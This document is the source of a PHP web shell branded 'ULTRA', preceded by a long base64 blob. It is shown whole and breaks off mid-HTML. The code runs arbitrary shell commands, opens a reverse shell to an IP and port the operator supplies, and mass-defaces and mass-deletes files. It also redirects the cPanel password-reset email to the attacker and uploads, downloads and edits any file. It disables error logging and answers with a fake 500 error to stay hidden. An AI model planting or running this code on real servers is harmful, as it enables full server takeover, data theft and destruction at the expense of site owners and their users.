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";
@eval {
    clearstatcache();
    header("X-Content-Type-Options: 0");
    header("X-XSS-Protection: 0");
    header("Content-Type: text/html");
    header_remove("x-powered-by");
    @ob_start();
    @session_start();
    @set_time_limit(0);
    @ini_set("max_execution_time", 0);
    @error_reporting(0);
    @ini_set("output_buffering", 0);
    @ini_set("display_errors", 0);
    @ini_set("log_errors", 0);
    @ini_set('error_log', 0);
    if (isset($_GET['action']) && $_GET['action'] == 'download') {
        @ob_clean();
        $file = $_GET['item'];
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
    header("HTTP/1.1 500 Internal Server Error", 0, 500);
    http_response_code(500);
    function flash($message, $status, $class, $redirect = false)
    {
        if (!empty($_SESSION["message"])) {
            unset($_SESSION["message"]);
        }
        if (!empty($_SESSION["class"])) {
            unset($_SESSION["class"]);
        }
        if (!empty($_SESSION["status"])) {
            unset($_SESSION["status"]);
        }
        $_SESSION["message"] = $message;
        $_SESSION["class"] = $class;
        $_SESSION["status"] = $status;
        if ($redirect) {
            header('Location: ' . $redirect);
            exit;
        }
        return true;
    }
    function clear()
    {
        if (!empty($_SESSION["message"])) {
            unset($_SESSION["message"]);
        }
        if (!empty($_SESSION["class"])) {
            unset($_SESSION["class"]);
        }
        if (!empty($_SESSION["status"])) {
            unset($_SESSION["status"]);
        }
        return true;
    }
    function writable($path, $perms)
    {
        return !is_writable($path) ? "<font color=\"red\">" . $perms . "</font>" : "<font color=\"lime\">" . $perms . "</font>";
    }
    function perms($path)
    {
        $perms = fileperms($path);
        if (($perms & 0xc000) == 0xc000) {
            // Socket
            $info = 's';
        } elseif (($perms & 0xa000) == 0xa000) {
            // Symbolic Link
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {
            // Regular
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {
            // Block special
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {
            // Directory
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {
            // Character special
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {
            // FIFO pipe
            $info = 'p';
        } else {
            // Unknown
            $info = 'u';
        }
        $info .= $perms & 0x100 ? 'r' : '-';
        $info .= $perms & 0x80 ? 'w' : '-';
        $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
        $info .= $perms & 0x20 ? 'r' : '-';
        $info .= $perms & 0x10 ? 'w' : '-';
        $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
        $info .= $perms & 0x4 ? 'r' : '-';
        $info .= $perms & 0x2 ? 'w' : '-';
        $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
        return $info;
    }
    function fsize($file)
    {
        $a = ["B", "KB", "MB", "GB", "TB", "PB"];
        $pos = 0;
        $size = filesize($file);
        while ($size >= 1024) {
            $size /= 1024;
            $pos++;
        }
        return round($size, 2) . " " . $a[$pos];
    }
    if (isset($_GET['dir'])) {
        $path = $_GET['dir'];
        chdir($_GET['dir']);
    } else {
        $path = getcwd();
    }
    $path = str_replace('\\', '/', $path);
    $exdir = explode('/', $path);
    function getOwner($item)
    {
        if (function_exists("posix_getpwuid")) {
            $downer = @posix_getpwuid(fileowner($item));
            $downer = $downer['name'];
        } else {
            $downer = fileowner($item);
        }
        if (function_exists("posix_getgrgid")) {
            $dgrp = @posix_getgrgid(filegroup($item));
            $dgrp = $dgrp['name'];
        } else {
            $dgrp = filegroup($item);
        }
        return $downer . '/' . $dgrp;
    }
    // CMD
    function cmd($command)
    {
        global $path;
        if (strpos($command, 'resetcp') !== false) {
            $email = explode(' ', $command);
            if (!$email[1] || !filter_var($email[1], FILTER_VALIDATE_EMAIL)) {
                return "You must specified valid email address. resetcp youremail@example.com";
            }
            $pathcp = explode("/", $path);
            $text = "---\n\"email\":'{$email[1]}'";
            $file = join('/', [$pathcp[0], $pathcp[1], $pathcp[2]]);
            $file .= '/.cpanel/';
            if (file_exists($file . 'contactinfo')) {
                unlink($file . 'contactinfo');
            }
            file_put_contents($file . 'reset', $text);
            if (file_exists($file . 'reset')) {
                rename($file . 'reset', $file . 'contactinfo');
                return "Email for reset cpanel changed to '{$email[1]}'";
            }
            return "Failed to change reset cp email!";
        } elseif (function_exists('shell_exec')) {
            return shell_exec($command . ' 2>&1');
        } else {
            return "Disable Function";
        }
    }
    // Back Conncect
    function bctool()
    {
        if (isset($_POST['ip']) && isset($_POST['port'])) {
            echo "<center>";
            echo "<p>BackConnect by ULTRA</p>";
            echo '<button type="button" class="btn btn-outline-light" onclick="history.go(-2)">Back</button>';
            echo "</center>";
            $sockfd = fsockopen($_POST['ip'], $_POST['port'], $errno, $errstr);
            if ($errno != 0) {
                echo "<center>";
                echo "<br><font color='red'>{$errno} : {$errstr}</font>";
                echo "</center>";
            } else {
                if (!$sockfd) {
                    $result = "<center><br><p>Unexpected error has occured, connection may have failed.</p></center>";
                } else {
                    @fputs($sockfd, "   _   _   _   _   _  \n  / \\ / \\ / \\ / \\ / \\  Back\n ( U | L | T | R | A ) Connect\n  \\_/ \\_/ \\_/ \\_/ \\_/\n\n");
                    $dir = @shell_exec("pwd");
                    $sysinfo = @shell_exec("uname -a");
                    $time = @shell_exec("time");
                    $len = 1337;
                    fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n");
                    while (!feof($sockfd)) {
                        $cmdPrompt = '[ULTRA]:~$ ';
                        @fputs($sockfd, $cmdPrompt);
                        $command = @fgets($sockfd, $len);
                        @fputs($sockfd, "\n" . @shell_exec($command) . "\n");
                    }
                    @fclose($sockfd);
                }
            }
        } else {
            echo '<!-- back connect -->  ';
            echo '<form action="" method="post">';
            echo '<div class="mb-3">';
            echo '<label class="form-label">Ip</label>';
            echo '<input type="text" class="form-control" name="ip" placeholder="127.0.0.0" required>';
            echo '</div>';
            echo '<div class="mb-3">';
            echo '<label class="form-label">Port</label>';
            echo '<input type="text" class="form-control" name="port" placeholder="1337" required>';
            echo '</div>';
            echo '<button class="btn btn-outline-light" type="submit">Submit</button>';
            echo '</form>';
        }
    }
    // Mass Deface
    function massdeface($path)
    {
        function massdef($dir, $file, $content)
        {
            if (is_writable($dir)) {
                $dira = scandir($dir);
                foreach ($dira as $dirb) {
                    $dirc = "{$dir}/{$dirb}";
                    $lokasi = $dirc . '/' . $file;
                    if ($dirb === '.') {
                        file_put_contents($lokasi, $content);
                    } elseif ($dirb === '..') {
                        file_put_contents($lokasi, $content);
                    } else {
                        if (is_dir($dirc)) {
                            if (is_writable($dirc)) {
                                echo "{$dirb}/{$file}\n";
                                file_put_contents($lokasi, $content);
                            }
                        }
                    }
                }
            }
        }
        if (isset($_POST['massDefDir']) && isset($_POST['massDefName']) && isset($_POST['massDefContent'])) {
            $name = $_POST['massDefName'];
            echo "<center>------- Result -------</center>";
            echo '<div class="card text-dark col-md-7 mb-3 mt-2">';
            echo "<pre>Done ~~<br><br>./{$name}<br>";
            massdef($_POST['massDefDir'], $name, $_POST['massDefContent']);
            echo '</pre></div>';
        } else {
            echo '<!-- mass deface -->  ';
            echo '<div class="col-md-5">';
            echo '<form action="" method="post">';
            echo '<div class="mb-3">';
            echo '<label class="form-label">Directory</label>';
            echo "<input type='text' class='form-control' name='massDefDir' value='{$path}'>";
            echo '</div>';
            echo '<div class="mb-3">';
            echo '<label class="form-label">File Name</label>';
            echo '<input type="text" class="form-control" name="massDefName" placeholder="test.php">';
            echo '</div>';
            echo '<div class="mb-3">';
            echo '<label class="form-label">File Content</label>';
            echo '<textarea class="form-control" name="massDefContent" rows="7" placeholder="Hello World"></textarea>';
            echo '</div>';
            echo '<button class="btn btn-outline-light" type="submit">Submit</button>';
            echo '</form>';
            echo '</div>';
        }
    }
    // Mass Delete
    function massdelete($path)
    {
        function massdel($dir, $file)
        {
            if (is_writable($dir)) {
                $dira = scandir($dir);
                foreach ($dira as $dirb) {
                    $dirc = "{$dir}/{$dirb}";
                    $lokasi = $dirc . '/' . $file;
                    if ($dirb === '.') {
                        if (file_exists("{$dir}/{$file}")) {
                            unlink("{$dir}/{$file}");
                        }
                    } elseif ($dirb === '..') {
                        if (file_exists('' . dirname($dir) . "/{$file}")) {
                            unlink('' . dirname($dir) . "/{$file}");
                        }
                    } else {
                        if (is_dir($dirc)) {
                            if (is_writable($dirc)) {
                                if ($lokasi) {
                                    echo "{$lokasi} > Deleted\n";
                                    unlink($lokasi);
                                    $massdel = massdel($dirc, $file);
                                }
                            }
                        }
                    }
                }
            }
        }
        if (isset($_POST['massDel']) && isset($_POST['massDelName'])) {
            $name = $_POST['massDelName'];
            echo "<center>------- Result -------</center>";
            echo '<div class="card text-dark col-md-7 mb-3 mt-2">';
            echo "<pre>Done ~~<br><br>./{$name} > Deleted<br>";
            massdel($_POST['massDel'], $name);
            echo '</pre></div>';
        } else {
            echo '<!-- mass delete -->  ';
            echo '<div class="col-md-5">';
            echo '<form action="" method="post">';
            echo '<div class="mb-3">';
            echo '<label class="form-label">Directory</label>';
            echo "<input type='text' class='form-control' name='massDel' value='{$path}'>";
            echo '</div>';
            echo '<div class="mb-3">';
            echo '<label class="form-label">File Name</label>';
            echo '<input type="text" class="form-control" name="massDelName" placeholder="test.php">';
            echo '</div>';
            echo '<button class="btn btn-outline-light" type="submit">Submit</button>';
            echo '</form>';
            echo '</div>';
        }
    }
    //  Mail test
    function mailer($serv)
    {
        if (isset($_POST['mail1'])) {
            $rand = rand(1, 9999);
            mail($_POST['mail1'], "Report Test " . $serv . " - " . $rand, "WORKING !");
            echo "<center>------- Result -------</center>";
            echo '<div class="card text-dark col-md-7 mb-3 mt-2">';
            echo "<pre>Done ~~<br><br>";
            echo "Send an report to [" . $_POST['mail1'] . "] - Order : {$rand}</b>";
            echo '</pre></div>';
        } else {
            echo '<!-- mail test -->  ';
            echo '<div class="col-md-5">';
            echo '<form action="" method="post">';
            echo '<div class="mb-3">';
            echo '<label for="name" class="form-label">Email</label>';
            echo '<input type="email" class="form-control" name="mail1" placeholder="email@mail.com">';
            echo '</div>';
            echo '<button class="btn btn-outline-light" type="submit">Submit</button>';
            echo '</form>';
        }
    }
    if (isset($_POST['newFolderName'])) {
        if (mkdir($path . '/' . $_POST['newFolderName'])) {
            flash("Create Folder Successfully!", "Success", "success", "?dir={$path}");
        } else {
            flash("Create Folder Failed", "Failed", "error", "?dir={$path}");
        }
    }
    if (isset($_POST['newFileName']) && isset($_POST['newFileContent'])) {
        if (file_put_contents($_POST['newFileName'], $_POST['newFileContent'])) {
            flash("Create File Successfully!", "Success", "success", "?dir={$path}");
        } else {
            flash("Create File Failed", "Failed", "error", "?dir={$path}");
        }
    }
    if (isset($_POST['newName']) && isset($_GET['item'])) {
        if ($_POST['newName'] == '') {
            flash("You miss an important value", "Ooopss..", "warning", "?dir={$path}");
        }
        if (rename($path . '/' . $_GET['item'], $_POST['newName'])) {
            flash("Rename Successfully!", "Success", "success", "?dir={$path}");
        } else {
            flash("Rename Failed", "Failed", "error", "?dir={$path}");
        }
    }
    if (isset($_POST['newContent']) && isset($_GET['item'])) {
        if (file_put_contents($path . '/' . $_GET['item'], $_POST['newContent'])) {
            flash("Edit Successfully!", "Success", "success", "?dir={$path}");
        } else {
            flash("Edit Failed", "Failed", "error", "?dir={$path}");
        }
    }
    if (isset($_POST['newPerm']) && isset($_GET['item'])) {
        if ($_POST['newPerm'] == '') {
            flash("You miss an important value", "Ooopss..", "warning", "?dir={$path}");
        }
        if (chmod($path . '/' . $_GET['item'], $_POST['newPerm'])) {
            flash("Change Permission Successfully!", "Success", "success", "?dir={$path}");
        } else {
            flash("Change Permission", "Failed", "error", "?dir={$path}");
        }
    }
    if (isset($_GET['action'])) {
        $action = $_GET['action'];
        if ($action == 'delete' && isset($_GET['item'])) {
            function removedir($dir)
            {
                if (!rmdir($dir)) {
                    $file = scandir($dir);
                    foreach ($file as $files) {
                        if (is_file($dir . "/" . $files)) {
                            if (unlink($dir . "/" . $files)) {
                                rmdir($dir);
                            }
                        }
                        if (is_dir($dir . "/" . $files)) {
                            rmdir($dir . "/" . $files);
                            rmdir($dir);
                        }
                    }
                }
            }
            if (is_dir($_GET['item'])) {
                if (removedir($_GET['item'])) {
                    flash("Delete Folder Successfully!", "Success", "success", "?dir={$path}");
                } else {
                    flash("Delete Folder Successfully!", "Success", "success", "?dir={$path}");
                }
            } else {
                if (unlink($_GET['item'])) {
                    flash("Delete File Successfully!", "Success", "success", "?dir={$path}");
                } else {
                    flash("Delete File Failed", "Failed", "error", "?dir={$path}");
                }
            }
        }
    }
    if (isset($_FILES['uploadfile'])) {
        $total = count($_FILES['uploadfile']['name']);
        for ($i = 0; $i < $total; $i++) {
            $mainupload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);
        }
        if ($total < 2) {
            if ($mainupload) {
                flash("Upload File Successfully! ", "Success", "success", "?dir={$path}");
            } else {
                flash("Upload Failed", "Failed", "error", "?dir={$path}");
            }
        } else {
            if ($mainupload) {
                flash("Upload {$i} Files Successfully! ", "Success", "success", "?dir={$path}");
            } else {
                flash("Upload Failed", "Failed", "error", "?dir={$path}");
            }
        }
    }
    $dirs = scandir($path);
    $d0mains = @file("/etc/named.conf", false);
    if (!$d0mains) {
        $dom = "Cant read /etc/named.conf";
        $GLOBALS["need_to_update_header"] = "true";
    } else {
        $count = 0;
        foreach ($d0mains as $d0main) {
            if (@strstr($d0main, "zone")) {
                preg_match_all('#zone "(.*)"#', $d0main, $domains);
                flush();
                if (strlen(trim($domains[1][0])) > 2) {
                    flush();
                    $count++;
                }
            }
        }
        $dom = "{$count} Domain";
    }
    $ip = gethostbyname($_SERVER['HTTP_HOST']);
    $uip = $_SERVER['REMOTE_ADDR'];
    $serv = $_SERVER['HTTP_HOST'];
    $soft = $_SERVER['SERVER_SOFTWARE'];
    $cmd_uname = cmd("uname -a");
    $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : 'Uname Error!');
    ?>
<html>
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noindex, nofollow">
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
        <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous" />
        <title>ULTRA [ <?php 
    echo $serv;
    ?> ]</title>
        <link href="https://fonts.googleapis.com/css2?family=Ubuntu+Mono" rel="stylesheet">
        <style type="text/css">
            * {
                font-family: Ubuntu Mono;
            }
            a {
                text-decoration: none;
                color: white;
            }
            a:hover {
                color: white;
            }
            /* width */
            ::-webkit-scrollbar {
                width: 7px;
                height: 7px;
            }
            /* Handle */
            ::-webkit-scrollbar-thumb {
                background: grey;
                border-radius: 7px;
            }
            /* Track */
            ::-webkit-scrollbar-track {
                box-shadow: inset 0 0 7px grey;
                border-radius: 7px;
            }
            .td-break {
                word-break: break-all
            }
        </style>
    </head>
    <body class="bg-dark text-light">
        <div class="container-fluid">
            <div class="py-3" id="main">
                <div class="p-4 rounded-3">
                    <table class="table table-borderless text-light">
                        <tr>
                            <td style="width: 7%;">Operation</td>
                            <td style="width: 1%">:</td>
                            <td><?php 
    echo $uname;
    ?></td>
                        </tr>
                        <tr>
                            <td style="width: 7%;">Software</td>
                            <td style="width: 1%">:</td>
                            <td><?php 
    echo $soft;
    ?></td>
                        </tr>
                        <tr>
                            <td style="width: 7%;">Server IP</td>
                            <td style="width: 1%">:</td>
                            <td><?php 
    echo $ip;
    ?>&ensp;|&ensp;Your IP: <?php 
    echo $uip;
    ?></td>
                        </tr>
                        <tr>
                            <td style="width: 7%;">Domains</td>
                            <td style="width: 1%">:</td>
                            <td><?php 
    echo $dom;
    ?></td>
                        </tr>
                        <tr>
                            <td style="width: 7%;">Permission</td>
                            <td style="width: 1%">:</td>
                            <td>[&nbsp;<?php 
    echo writable($path, perms($path));
    ?>&nbsp;]</td>
                        </tr>
                    </table>
                    <div class="p-2">
                        <i class="fa fa fa-folder pt-1"></i>&ensp;
                        <?php 
    foreach ($exdir as $id => $pat) {
        if ($pat == '' && $id == 0) {
            ?>

                            <a href="?dir=/" class="text-decoration-none text-light">/</a>
                        <?php 
        }
        if ($pat == '') {
            continue;
        }
        ?>

                            <a href="?dir=<?php 
        for ($i = 0; $i <= $id; $i++) {
            echo "{$exdir[$i]}";
            if ($i != $id) {
                echo "/";
            }
        }
        ?>" class="text-decoration-none text-light"><?php 
        echo $pat;
        ?></a>
                            <span class="text-light"> /</span>
                        <!-- endforeach -->
                        <?php 
    }
    ?>

                    </div>
                    
                    <!-- configuration fiture -->
                    <div id="tools">
                        <center>
                            <hr width='20%'>
                        </center>
                        <div class="d-flex justify-content-center flex-wrap my-3">
                            <a href="?" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-home"></i> Home</a>
                            <a href="?dir=<?php 
    echo $path;
    ?>&item=<?php 
    echo $dir;
    ?>&action=upload" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-upload"></i> Upload</a>
                            <a href="?dir=<?php 
    echo $path;
    ?>&item=<?php 
    echo $dir;
    ?>&action=command" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-terminal"></i> Command</a>
                            <a href="?dir=<?php 
    echo $path;
